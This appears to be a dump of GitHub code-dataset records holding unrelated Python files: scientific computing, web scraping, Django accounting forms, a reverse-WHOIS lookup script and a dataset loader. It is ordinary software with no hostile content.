numpy_vectorized_efd(contour, order=10, normalize=False):\n \"\"\"Calculate elliptical Fourier descriptors for a contour.\n :param numpy.ndarray contour: A contour array of size ``[M x 2]``.\n :param int order: The order of Fourier coefficients to calculate.\n :param bool normalize: If the coefficients should be normalized;\n see references for details.\n :return: A ``[order x 4]`` array of Fourier coefficients.\n :rtype: :py:class:`numpy.ndarray`\n \"\"\"\n dxy = np.diff(contour, axis=0)\n\n dt = dxy ** 2\n dt = dt.sum(axis=1)\n dt = np.sqrt(dt)\n\n t = np.cumsum(dt)\n t = np.concatenate([([0.]), t])\n T = t[-1]\n\n phi = (2 * np.pi * t) / T\n\n orders = np.arange(1, order + 1)\n phi = phi * orders.reshape((order, -1))\n d_cos_phi = np.cos(phi[:, 1:]) - np.cos(phi[:, :-1])\n d_sin_phi = np.sin(phi[:, 1:]) - np.sin(phi[:, :-1])\n cos_phi = (dxy[:, 0] / dt) * d_cos_phi\n\n consts = T / (2 * orders * orders * np.pi * np.pi)\n a = consts * np.sum(cos_phi, axis=1)\n b = consts * np.sum((dxy[:, 0] / dt) * d_sin_phi, axis=1)\n c = consts * np.sum((dxy[:, 1] / dt) * d_cos_phi, axis=1)\n d = consts * np.sum((dxy[:, 1] / dt) * d_sin_phi, axis=1)\n\n coeffs = np.concatenate([\n a.reshape((order, 1)),\n b.reshape((order, 1)),\n c.reshape((order, 1)),\n d.reshape((order, 1))\n ], axis=1)\n\n return coeffs\n","repo_name":"SPINLab/neighborhoods-autoencoder","sub_path":"model/numpy_vectorized_efd.py","file_name":"numpy_vectorized_efd.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"73218963131","text":"import json\nimport time\nimport requests\nimport csv\n#import torch\nimport numpy as np\nfrom rdkit.Chem import Descriptors\nfrom rdkit import Chem\nimport os\nimport random\nimport xml\nimport xml.etree.ElementTree as ET\nfrom xml.dom.minidom import parse\nfrom tqdm import tqdm\n\n# 第一步下载数据,和获取数值型数据\n\n\ndef get_page(url):\n try:\n header = {\n \"user-agent\": \"Chrome/89.0.4381.102\"\n }\n response = requests.get(url, headers=header)\n if response.status_code == 200:\n return response.text\n return None\n except Exception:\n return None\n\n\ndef get_XML(file_ids):\n for file_id in file_ids:\n path = \"./ms_data/msxml/{}.xml\".format(file_id)\n if os.path.exists(path):\n print(\"{}.xml 文件已存在。\".format(file_id))\n continue\n JSONfile = get_page(\n \"https://hmdb.ca/metabolites/{}.xml\".format(file_id))\n if JSONfile != \"\" or JSONfile != None:\n with open(path, \"a\") as f:\n f.write(JSONfile)\n print(\"{}.xml写入完毕!\".format(file_id))\n else:\n print(\"{}.xml无法写入!!!\".format(file_id))\n time.sleep(1)\n\n\ndef get_smile(file_name):\n DOMTree = parse(r'./ms_data/msxml/{}'.format(file_name))\n booklist = DOMTree.documentElement\n books = booklist.getElementsByTagName('smiles')[0]\n smile = books.childNodes[0].data\n return smile\n\n\ndef get_descriptors(ids, smiles):\n # descriptors = [\"MolLogP\", \"ExactMolWt\", \"HeavyAtomMolWt\", \"NHOHCount\", \"NOCount\", \"NumHAcceptors\", \"NumHDonors\",\n # \"NumHeteroatoms\", \"NumRotatableBonds\", \"NumValenceElectrons\", \"RingCount\", \"TPSA\"]\n file = \"./ms_data/ms_des.csv\"\n print(\"======开始写入描述符======\")\n n = len(smiles)\n for i in tqdm(range(len(smiles))):\n descriptor = []\n try:\n with open(file, \"a\") as f:\n m = Chem.MolFromSmiles(smiles[i])\n descriptor.append(ids[i])\n # descriptor.append(smiles[i])\n descriptor.append(Descriptors.MolLogP(m))\n descriptor.append(Descriptors.ExactMolWt(m))\n descriptor.append(Descriptors.HeavyAtomMolWt(m))\n descriptor.append(Descriptors.NHOHCount(m))\n descriptor.append(Descriptors.NOCount(m))\n descriptor.append(Descriptors.NumHAcceptors(m))\n descriptor.append(Descriptors.NumHDonors(m)\n ) # H受体和给体包含分子的电子分布信息\n descriptor.append(Descriptors.NumHeteroatoms(m))\n descriptor.append(\n Descriptors.NumRotatableBonds(m)) # 包含拓扑结构的相关信息\n descriptor.append(Descriptors.NumValenceElectrons(m)) # 电子信息\n descriptor.append(Descriptors.RingCount(m)) # 3D结构和电子信息\n descriptor.append(Descriptors.TPSA(m)) # 极化信息 电子信息\n des = \",\".join([str(item) for item in descriptor]) + \"\\n\"\n # des[0] = 0\n f.write(des)\n except Exception as e:\n continue\n print(\"======描述符写入完毕======\")\n return \n\n\nif __name__ == '__main__':\n # ms_root = \"./ms_data/hmdb_predicted_cms_peak_lists\"\n # files = os.listdir(ms_root)\n # filess = [file[:11] for file in files]\n # # 获取了唯一id\n # files = list(set(filess))\n # get_XML(files)\n # getDescriptors(smiles)\n\n xml_root = \"./ms_data/msxml\"\n files = os.listdir(xml_root)\n ids = []\n smiles = []\n id_smiles_file = \"./ms_data/id_smiles.csv\"\n for file in tqdm(files):\n with open(id_smiles_file, \"a\") as f:\n try:\n name, smile = file[:11], get_smile(file)\n except Exception as e:\n continue\n ids.append(name)\n smiles.append(smile)\n f.write(\"{},{}\\n\".format(name, smile))\n print(\"smiles采集完毕\")\n get_descriptors(ids, smiles)\n","repo_name":"chensaian/TransG-Net","sub_path":"getms.py","file_name":"getms.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"18533967610","text":"from bs4 import BeautifulSoup\nimport io\nimport csv\nfrom db import mongo_db as db\n\n\ndef read_file(path, encoding=\"utf-8\"):\n f = io.open(path, mode=\"r\", encoding=encoding)\n text = f.read()\n f.close()\n return text\n\n\ndef get_soup(path):\n soup = BeautifulSoup(read_file(path), \"html.parser\")\n return soup\n\n\ndef country_table(tag):\n return tag.name == 'table' and tag.has_attr('class') and 'nix' in tag[\"class\"]\n\n\n# a country row has 3 cells of which the first contains a link\ndef country_row(tag):\n return tag.name == 'tr' and len(tag.find_all(\"td\")) == 3 and tag.td.a\n\n\ndef get_eng_to_german_countries():\n eng_to_ger = {}\n soup = get_soup('/Users/roman/PycharmProjects/PersonalLifeCoach/static/countries_deu_eng.html')\n for table in soup.find_all(country_table):\n for row in table.find_all(country_row):\n eng_name = row.td.a.string\n ger_name = row.find_all(\"td\")[1].string\n if eng_name and ger_name:\n eng_to_ger[eng_name] = ger_name\n return eng_to_ger\n\n\ndef country_codes_row(tag):\n return tag.name == 'tr' and len(tag.find_all(\"td\")) == 5\n\n\ndef get_country_list():\n countries = []\n soup = get_soup('/Users/roman/PycharmProjects/PersonalLifeCoach/static/country_codes.html')\n for row in soup.table.find_all(country_codes_row):\n eng_name, alpha2_cd, alpha3_cd, un_cd = row.find_all(\"td\")[1:]\n if eng_name.em:\n eng_name = eng_name.em.string\n elif eng_name.string:\n eng_name = eng_name.string\n elif eng_name.a:\n eng_name = eng_name.a.string\n if eng_name:\n countries.append({\n \"eng_name\": eng_name,\n \"alpha2_cd\": alpha2_cd.string,\n \"alpha3_cd\": alpha3_cd.string,\n \"un_cd\": un_cd.string,\n })\n return countries\n\n\ndef csv_row_to_dict(row):\n return {\n \"country\": row[\"Country\"].upper(),\n \"city\": row[\"AccentCity\"],\n \"lat\": row[\"Latitude\"],\n \"long\": row[\"Longitude\"]\n }\n\n\ndef insert_cities():\n f = io.open(\"/Users/roman/PycharmProjects/PersonalLifeCoach/static/all_cities.txt\", mode=\"r\", encoding=\"utf-8\")\n csv_reader = csv.DictReader(f)\n for row in csv_reader:\n city = csv_row_to_dict(row)\n db.insert_city(city)\n f.close()\n\nif __name__ == '__main__':\n eng_to_ger = get_eng_to_german_countries()\n print(eng_to_ger)\n country_list = get_country_list()\n\n for country in country_list:\n # add german name if existent\n if country[\"eng_name\"] in eng_to_ger:\n country[\"ger_name\"] = eng_to_ger[country[\"eng_name\"]]\n db.insert_country(country)\n\n insert_cities()\n","repo_name":"RomanKuratli/PersonalLifeCoach","sub_path":"one_timers/parse_countries_and_cities.py","file_name":"parse_countries_and_cities.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28611657047","text":"from random import *\n\nn = 40000\nm = 5\nq = 40000\nC = 10**6\n\nprint(n, m, q)\n\nW = []\nfor i in range(m):\n l = randint(-C, C - 1)\n r = randint(l + 1, C)\n y = randint(1, C)\n W.append((l, r, y))\n\ncnt = 0\nwhile cnt < n:\n x = randint(-C, C)\n y = randint(1, C)\n ok = True\n for i in range(m):\n if y == W[i][2] and W[i][0] <= x <= W[i][1]:\n ok = False\n\n if ok:\n print(x, y)\n cnt += 1\n\nfor l, r, y in W:\n print(l, r, y)\n\nfor i in range(q):\n x = randint(-C, C)\n y = randint(1, C)\n print(x, -y)\n","repo_name":"riteme/test","sub_path":"icpc/2020-9-26/E-gen.py","file_name":"E-gen.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"26752315604","text":"import turtle as t\nimport math\n\nt.speed(10)\nt.setup(width = 1440, height = 900)\nt.hideturtle()\nt.color('black')\n\ndef line(x1,y1,x2,y2): # 좌표평면 그리는 함수\n t.up()\n t.goto(x1,y1)\n t.down()\n t.goto(x2,y2)\n return\n\ndef write(x,y,text): #텍스트 입력\n t.up()\n t.goto(x,y)\n t.down()\n t.write(text)\n return\n\ndef move(x, y): # 팬 이동 함수\n t.up()\n t.goto(x, y)\n t.down()\n\nline(-720,0,720,0)\nline(0,-720,0,720)\n\ni=-720 #좌표 찍기\nwhile i<=720:\n i=i+90\n line(i,-5,i,5)\n write(i-10,-20,i)\n\ni = -720\nwhile i <= 720:\n i = i+90\n line(-5, i, 5, i)\n write(7, i-5, i)\n\nt.color('red')\nmove(-720, 0)\nfor x in range(-360*3, 360*3):\n t.goto(x, 90*math.sin(x*3.14/180))\n\nt.color('blue')\nmove(-720, 0)\nfor x in range(-360*3, 360*3):\n t.goto(x, 90*math.cos(x*3.14/180))\n\nt.done()","repo_name":"doubleyou77/samgagbi_math","sub_path":"sin_cos_function.py","file_name":"sin_cos_function.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7100517912","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.db import transaction\nfrom django.forms import BaseInlineFormSet, inlineformset_factory\nfrom djmoney.forms import MoneyField\nfrom moneyed import Money\nfrom mptt.forms import TreeNodeChoiceField\n\nfrom hordak.defaults import CURRENCIES, DECIMAL_PLACES, DEFAULT_CURRENCY, MAX_DIGITS\nfrom hordak.models import Account, Leg, Transaction\n\n\nclass SimpleTransactionForm(forms.ModelForm):\n \"\"\"A simplified form for transferring an an amount from one account to another\n\n This only allows the creation of transactions with two legs. This also uses\n :meth:`Account.transfer_to()`.\n\n See Also:\n\n * :meth:`hordak.models.Account.transfer_to()`.\n \"\"\"\n\n from_account = TreeNodeChoiceField(\n queryset=Account.objects.all(), to_field_name=\"uuid\"\n )\n to_account = TreeNodeChoiceField(\n queryset=Account.objects.all(), to_field_name=\"uuid\"\n )\n amount = MoneyField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES)\n\n class Meta:\n model = Transaction\n fields = [\"amount\", \"from_account\", \"to_account\", \"date\", \"description\"]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Limit currency choices if setup\n default_currency = DEFAULT_CURRENCY\n amount_field, currency_field = self.fields[\"amount\"].fields\n\n currencies = CURRENCIES() if callable(CURRENCIES) else CURRENCIES\n self.fields[\"amount\"].widget.widgets[1].choices = currency_field.choices = [\n (code, name)\n for code, name in currency_field.choices\n if code == default_currency or code in currencies\n ]\n self.fields[\"amount\"].initial[1] = default_currency\n\n def save(self, commit=True):\n from_account = self.cleaned_data.get(\"from_account\")\n to_account = self.cleaned_data.get(\"to_account\")\n amount = self.cleaned_data.get(\"amount\")\n\n return from_account.transfer_to(\n to_account=to_account,\n amount=amount,\n description=self.cleaned_data.get(\"description\"),\n date=self.cleaned_data.get(\"date\"),\n )\n\n\nclass TransactionForm(forms.ModelForm):\n \"\"\"A form for managing transactions with an arbitrary number of legs.\n\n You will almost certainly\n need to combine this with :class:`LegFormSet` in order to\n create & edit transactions.\n\n .. note::\n\n For simple transactions (with a single credit and single debit) you a probably\n better of using the :class:`SimpleTransactionForm`. This significantly simplifies\n both the interface and implementation.\n\n Attributes:\n\n description (forms.CharField): Optional description/notes for this transaction\n\n See Also:\n\n This is a `ModelForm` for the :class:`Transaction model `.\n \"\"\"\n\n description = forms.CharField(label=\"Transaction notes\", required=False)\n\n class Meta:\n model = Transaction\n fields = (\"description\",)\n\n def save(self, commit=True):\n return super(TransactionForm, self).save(commit)\n\n\nclass LegForm(forms.ModelForm):\n \"\"\"A form for representing a single transaction leg\n\n Attributes:\n\n account (TreeNodeChoiceField): Choose an account the leg will interact with\n description (forms.CharField): Optional description/notes for this leg\n amount (MoneyField): The amount for this leg.\n Positive values indicate money coming into the transaction,\n negative values indicate money leaving the transaction.\n\n See Also:\n\n This is a `ModelForm` for the :class:`Leg model `.\n \"\"\"\n\n account = TreeNodeChoiceField(Account.objects.all(), to_field_name=\"uuid\")\n description = forms.CharField(required=False)\n amount = MoneyField(\n required=True, max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES\n )\n\n class Meta:\n model = Leg\n fields = (\"amount\", \"account\", \"description\")\n\n def __init__(self, *args, **kwargs):\n self.statement_line = kwargs.pop(\"statement_line\", None)\n super(LegForm, self).__init__(*args, **kwargs)\n\n def clean_amount(self):\n amount = self.cleaned_data[\"amount\"]\n if amount.amount <= 0:\n raise ValidationError(\"Amount must be greater than zero\")\n\n if self.statement_line and self.statement_line.amount < 0:\n amount *= -1\n\n return amount\n\n\nclass BaseLegFormSet(BaseInlineFormSet):\n def __init__(self, **kwargs):\n self.statement_line = kwargs.pop(\"statement_line\")\n self.currency = self.statement_line.statement_import.bank_account.currencies[0]\n super(BaseLegFormSet, self).__init__(**kwargs)\n\n def get_form_kwargs(self, index):\n kwargs = super(BaseLegFormSet, self).get_form_kwargs(index)\n kwargs.update(statement_line=self.statement_line)\n if index == 0:\n kwargs.update(\n initial=dict(\n amount=Money(abs(self.statement_line.amount), self.currency)\n )\n )\n return kwargs\n\n def clean(self):\n super(BaseLegFormSet, self).clean()\n\n if any(self.errors):\n return\n\n amounts = [f.cleaned_data[\"amount\"] for f in self.forms if f.has_changed()]\n if Money(self.statement_line.amount, self.currency) != sum(amounts):\n raise ValidationError(\n \"Amounts must add up to {}\".format(self.statement_line.amount)\n )\n\n\nLegFormSet = inlineformset_factory(\n parent_model=Transaction,\n model=Leg,\n form=LegForm,\n extra=4,\n can_delete=False,\n formset=BaseLegFormSet,\n)\n\n\nclass CurrencyTradeForm(forms.Form):\n source_account = forms.ModelChoiceField(\n queryset=Account.objects.filter(children__isnull=True), to_field_name=\"uuid\"\n )\n source_amount = MoneyField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES)\n trading_account = forms.ModelChoiceField(\n queryset=Account.objects.filter(\n children__isnull=True, type=Account.TYPES.trading\n ),\n to_field_name=\"uuid\",\n help_text=\"The account in which to perform the trade. \"\n \"This account must support both the source and destination currency. If none exist \"\n \"perhaps create one.\",\n )\n destination_account = forms.ModelChoiceField(\n queryset=Account.objects.filter(children__isnull=True), to_field_name=\"uuid\"\n )\n destination_amount = MoneyField(\n max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES\n )\n description = forms.CharField(widget=forms.Textarea, required=False)\n\n def clean(self):\n cleaned_data = super(CurrencyTradeForm, self).clean()\n if self.errors:\n return cleaned_data\n\n source_account = cleaned_data[\"source_account\"]\n source_amount = cleaned_data[\"source_amount\"]\n trading_account = cleaned_data[\"trading_account\"]\n destination_amount = cleaned_data[\"destination_amount\"]\n destination_account = cleaned_data[\"destination_account\"]\n\n if source_amount.currency.code not in source_account.currencies:\n raise ValidationError(\n \"Source account does not support {}\".format(source_amount.currency)\n )\n if source_amount.currency.code not in trading_account.currencies:\n raise ValidationError(\n \"Trading account does not support {}\".format(source_amount.currency)\n )\n if destination_amount.currency.code not in trading_account.currencies:\n raise ValidationError(\n \"Trading account does not support {}\".format(source_amount.currency)\n )\n if destination_amount.currency.code not in destination_account.currencies:\n raise ValidationError(\n \"Destination account does not support {}\".format(\n destination_amount.currency\n )\n )\n\n return cleaned_data\n\n @transaction.atomic()\n def save(self):\n source_account = self.cleaned_data.get(\"source_account\")\n trading_account = self.cleaned_data.get(\"trading_account\")\n destination_account = self.cleaned_data.get(\"destination_account\")\n source_amount = self.cleaned_data.get(\"source_amount\")\n destination_amount = self.cleaned_data.get(\"destination_amount\")\n\n transaction = Transaction.objects.create(\n description=self.cleaned_data.get(\"description\")\n )\n Leg.objects.create(\n transaction=transaction, account=source_account, amount=source_amount\n )\n Leg.objects.create(\n transaction=transaction, account=trading_account, amount=-source_amount\n )\n Leg.objects.create(\n transaction=transaction, account=trading_account, amount=destination_amount\n )\n Leg.objects.create(\n transaction=transaction,\n account=destination_account,\n amount=-destination_amount,\n )\n return transaction\n","repo_name":"adamcharnock/django-hordak","sub_path":"hordak/forms/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":9112,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"78"} +{"seq_id":"6336095299","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport re\nimport os\nfrom setuptools import setup, find_packages\n\nEXTRAS_REQUIRE = {\n \"tests\": [\"pytest\", \"mock\", \"pytest-django==3.10.0\", \"factory-boy==2.11.1\"],\n \"lint\": [\n \"flake8==5.0.4\",\n 'flake8-bugbear==18.8.0; python_version >= \"3.5\"',\n \"pre-commit==2.17.0\",\n ],\n}\nEXTRAS_REQUIRE[\"dev\"] = (\n EXTRAS_REQUIRE[\"tests\"] + EXTRAS_REQUIRE[\"lint\"] + [\"konch>=3.0.0\", \"tox\"]\n)\n\n\ndef find_version(fname):\n \"\"\"Attempts to find the version number in the file names fname.\n Raises RuntimeError if not found.\n \"\"\"\n version = \"\"\n with open(fname, \"r\") as fp:\n reg = re.compile(r'__version__ = [\\'\"]([^\\'\"]*)[\\'\"]')\n for line in fp:\n m = reg.match(line)\n if m:\n version = m.group(1)\n break\n if not version:\n raise RuntimeError(\"Cannot find version information\")\n return version\n\n\ndef read(fname):\n with open(fname) as fp:\n content = fp.read()\n return content\n\n\nsetup(\n name=\"django-elasticsearch-metrics\",\n version=find_version(os.path.join(\"elasticsearch_metrics\", \"__init__.py\")),\n author=\"Steven Loria, Dawn Pattison\",\n author_email=\"steve@cos.io, pattison.dawn@cos.io\",\n description=\"Django app for storing time-series metrics in Elasticsearch.\",\n long_description=read(\"README.md\"),\n long_description_content_type=\"text/markdown\",\n url=\"http://github.com/CenterForOpenScience/django-elasticsearch-metrics\",\n license=\"MIT\",\n packages=find_packages(exclude=(\"tests\",)),\n keywords=(\n \"django\",\n \"elastic\",\n \"elasticsearch\",\n \"elasticsearch-dsl\",\n \"time-series\",\n \"metrics\",\n \"statistics\",\n ),\n install_requires=[\"elasticsearch-dsl>=6.3.0,<7.0.0\"],\n extras_require=EXTRAS_REQUIRE,\n classifiers=[\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Framework :: Django\",\n \"Framework :: Django :: 1.11\",\n \"Framework :: Django :: 2.0\",\n \"Framework :: Django :: 2.1\",\n \"Framework :: Django :: 2.2\",\n \"Framework :: Django :: 3.0\",\n \"Framework :: Django :: 3.1\",\n \"Framework :: Django :: 3.2\",\n \"Framework :: Django :: 4.0\",\n \"Framework :: Django :: 4.1\",\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n zip_safe=False,\n include_package_data=True,\n project_urls={\n \"Issues\": \"https://github.com/CenterForOpenScience/django-elasticsearch-metrics/issues\",\n \"Changelog\": \"https://github.com/CenterForOpenScience/django-elasticsearch-metrics/blob/master/CHANGELOG.md\",\n },\n)\n","repo_name":"CenterForOpenScience/django-elasticsearch-metrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"16874834730","text":"from preprocessing.graph_creator import Sentence\n\nimport json\nfrom collections import defaultdict\nfrom copy import deepcopy\nfrom typing import Dict, List, Iterable\nimport logging\nfrom multiprocessing import Pool\nfrom functools import partial\n\n# import line_profiler\n# import atexit\n# profile = line_profiler.LineProfiler()\n# atexit.register(profile.print_stats)\n\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(level=logging.INFO)\nLOGGER.addHandler(ch)\n\ndef read_trex(file_path):\n\n with open(file_path, 'r') as json_file:\n data = json.load(json_file)\n\n return data\n\n\ndef find_linked_entities(trex_list: List[dict]) -> Dict[str, set]:\n doc_entities = list()\n for current_doc in trex_list:\n doc_entities.extend([each for each in current_doc['entities'] if 'Entity' in each['annotator']])\n\n wiki2surfaceform = defaultdict(set)\n for entity_dict in doc_entities:\n wiki2surfaceform[entity_dict['uri']].add(entity_dict['surfaceform'])\n\n return wiki2surfaceform\n\n\ndef remove_overlapping_sentence_entities(sentence_entities):\n def range_in(range_set, range_):\n return any([range_[0] >= each_range[0] and range_[1] <= each_range[1] for each_range in range_set])\n\n def range_partially_in(range_set, range_):\n return any([(range_[0] >= each_range[0] and range_[0] <= each_range[1]) or\n (range_[1] >= each_range[0] and range_[1] <= each_range[1]) for each_range in range_set])\n\n range_set = set(sentence_entities.keys())\n range_set_2 = deepcopy(range_set)\n\n for range_, sentence_entity_dict in list(sentence_entities.items()):\n exclude_range_from_range_set = {each for each in range_set if each != range_}\n exclude_range_from_range_set_2 = {each for each in range_set_2 if each != range_}\n if range_in(exclude_range_from_range_set, range_):\n del sentence_entities[range_]\n elif range_partially_in(exclude_range_from_range_set_2, range_):\n del sentence_entities[range_]\n range_set_2.remove(range_)\n\n\ndef _get_sentence_text_and_entities(trex_list: List[dict]) -> Iterable[Sentence]:\n\n for current_doc in trex_list:\n doc_entities = [each for each in current_doc['entities'] if 'Entity' in each['annotator']]\n doc_list = list()\n for sentence_boundary in current_doc['sentences_boundaries']:\n sentence_entities = deepcopy([each for each in doc_entities if\n each['boundaries'][1] <= sentence_boundary[1] and each['boundaries'][0] >=\n sentence_boundary[0]])\n for each in sentence_entities:\n each['boundaries'] = [each['boundaries'][0] - sentence_boundary[0],\n each['boundaries'][1] - sentence_boundary[0]]\n\n sentence_entities_dict = {tuple(each['boundaries']): each for each in sentence_entities}\n sentence_text = current_doc['text'][sentence_boundary[0]: sentence_boundary[1]]\n doc_list.append((sentence_text, sentence_entities_dict, current_doc))\n\n yield doc_list\n\n# @profile\ndef iterate_sentences_from_trex(trex_list: List[dict]) -> Iterable[Sentence]:\n wiki2surfaceform = find_linked_entities(trex_list)\n LOGGER.info('Number of documents in this file : {}'.format(len(trex_list)))\n\n sentence_id = 0\n pool = Pool(processes=4)\n create_sentence_partial = partial(create_sentence, wiki2surfaceform=wiki2surfaceform)\n\n for doc_num, doc_list in enumerate(_get_sentence_text_and_entities(trex_list)):\n doc_list_with_sentence_id = list()\n for sentence_number, (sentence_text, sentence_entities, doc_info) in enumerate(doc_list):\n remove_overlapping_sentence_entities(sentence_entities)\n doc_list_with_sentence_id.append((sentence_id, sentence_text, sentence_entities, doc_info))\n LOGGER.info('Processed {} sentences in {}/{} docs'.format(sentence_number + 1, doc_num + 1, len(trex_list)))\n LOGGER.info('Sentence Text : {}'.format(sentence_text))\n sentence_id += 1\n\n for sentence_number, (sentence_id, sentence_text, sentence_entities, doc_info) in enumerate(doc_list_with_sentence_id):\n LOGGER.info('Processed {} sentences in {}/{} docs'.format(sentence_number + 1, doc_num + 1, len(trex_list)))\n LOGGER.info('Sentence Text : {}'.format(sentence_text))\n yield create_sentence_partial(sentence_id, sentence_text, sentence_entities, doc_info)\n\n # for sentence in pool.starmap(create_sentence_partial, doc_list_with_sentence_id):\n # yield sentence\n\n# @profile\ndef create_sentence(id_counter, sentence_text, sentence_entities, doc_info, wiki2surfaceform=None):\n sentence = Sentence(id=id_counter,\n sentence_text=sentence_text,\n sentence_entities=sentence_entities,\n wiki2surfaceform=wiki2surfaceform,\n doc_info=doc_info)\n sentence.create_graph()\n\n return sentence\n\n","repo_name":"issafuad/KnowledgeLM","sub_path":"preprocessing/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34946884191","text":"#Made for the sole purpose of GCI 2019\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs4\r\ndef prRed(skk): return str(\"\\033[91m {}\\033[00m\" .format(skk)) \r\ndef prYellow(skk): return str(\"\\033[93m {}\\033[00m\" .format(skk)) \r\ndef prPurple(skk): return str(\"\\033[95m {}\\033[00m\" .format(skk)) \r\ndef prCyan(skk): return str(\"\\033[96m {}\\033[00m\" .format(skk)) \r\ndef main():\r\n\tprint()\r\n\tquery = input(prRed(\"Enter the name of individual person or a company:\"))\r\n\tprint()\r\n\tlink = \"https://viewdns.info/reversewhois/?q=\" + query\r\n\tuser = \"Mozilla/5.0 (X11; Linux i586; rv:71.0) Gecko/20100101 Firefox/71.0\"\r\n\theaders = {\"User-Agent\": user}\r\n\trequest = requests.get(link, headers=headers) #requesting the page to get information according to query \r\n\ttable1 = bs4(request.content, \"html5lib\") #getting the contents of that page\r\n\ttable1 = table1.findAll('table')[3].encode() # finding the appropriate table\r\n\ttry1 = bs4(table1, \"html5lib\")\r\n\trow = try1.findAll('tr') #converting the table to readable format\r\n\ttest=1\r\n\tmainlist=[]\r\n\tfor i in row:\r\n\t\tif test==1:\r\n\t\t\ttest+=1 \r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tx=str(i) #Finding and sorting the elements of the table\r\n\t\t\ty=x.split(\"\") \r\n\t\t\ttmplist=[]\r\n\t\t\tfor j in y:\r\n\t\t\t\tif j=='':\r\n\t\t\t\t\tcontinue\r\n\t\t\t\telse:\r\n\t\t\t\t\tz=j[:-5]\r\n\t\t\t\t\tif \"\" in z:\r\n\t\t\t\t\t\tz=z[:-5]\r\n\t\t\t\t\tif z==\"\":\r\n\t\t\t\t\t\tz=\"N/A\"\r\n\t\t\t\t\ttmplist.append(z)\r\n\t\t\tmainlist.append(tmplist)\r\n\t\r\n\tif len(mainlist)==0:\r\n\t\tprint(prRed(\"Insufficient Data\"))\r\n\telse:\r\n\t\tprint(\"{:53}{:39}{}\".format(prRed(\"Domain Name\"),prRed(\"Creation Date\"),prRed(\"Registrar\")))\r\n\t\tprint()\r\n\t\tfor l in mainlist:\r\n\t\t\ttmpx=l[0]\r\n\t\t\ttmpy=l[1]\r\n\t\t\ttmpz=l[2]\r\n\t\t\tprint(\"{:54}{:35}{}\".format(prPurple(tmpx),prYellow(tmpy),prCyan(tmpz))) #Printing the output\r\n\t\t\tprint()\r\n\t\r\n\txt=input(prCyan(\"Do you wish to continue?[y/N]:\"))\r\n\tprint()\r\n\tif xt==\"y\":\r\n\t\tmain()\r\n\tif xt==\"N\":\r\n\t\tprint(prRed(\"Closing...\"))\r\n\t\treturn None\r\n\telse:\r\n\t\treturn None\r\nmain() #parent function called at start\r\n","repo_name":"Ayush19-01/GCI-Reverse-WHOIS","sub_path":"reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40311529665","text":"from app import app\nfrom flask import jsonify, request\nfrom sklearn.datasets import load_files\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nimport operator\n\nuza = load_files('.\\\\uza')\n\ncount_vect = CountVectorizer()\nX_train_counts = count_vect.fit_transform(uza.data)\nclf = MultinomialNB().fit(X_train_counts, uza.target)\ncategories = uza.target_names\n\n\n@app.route('/', methods=['POST'])\ndef index():\n global count_vect, clf, categories\n \n content = request.get_json() \n text = content.get('content') \n\n X_new_counts = count_vect.transform([text]) \n proba = clf.predict_proba(X_new_counts)\n norm = [float(i)/sum(proba[0]) for i in proba[0]] \n p_dict = dict(zip(categories, norm))\n sorted_dic = sorted(p_dict.items(), key=operator.itemgetter(1), reverse=True)\n return jsonify(labels=categories, data=norm, dict=sorted_dic)","repo_name":"lochin/mt","sub_path":"server/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7510277606","text":"import numpy as np\n\n\nfrom itertools import combinations\n\nclass MoeadUtils:\n\n def __init__(self,\n problem):\n\n self.problem = problem\n\n def factorial(self, n):\n result = 1\n for i in range(2, n + 1):\n result *= i\n return result\n\n def comb(self, n, k):\n return self.factorial(n) / (self.factorial(n - k) * self.factorial(k))\n\n #Simplex Lattice Design\n def UniformPoint(self, N, M):\n try:\n H1 = 1;\n while (self.comb(H1 + M, M - 1) <= N):\n H1 = H1 + 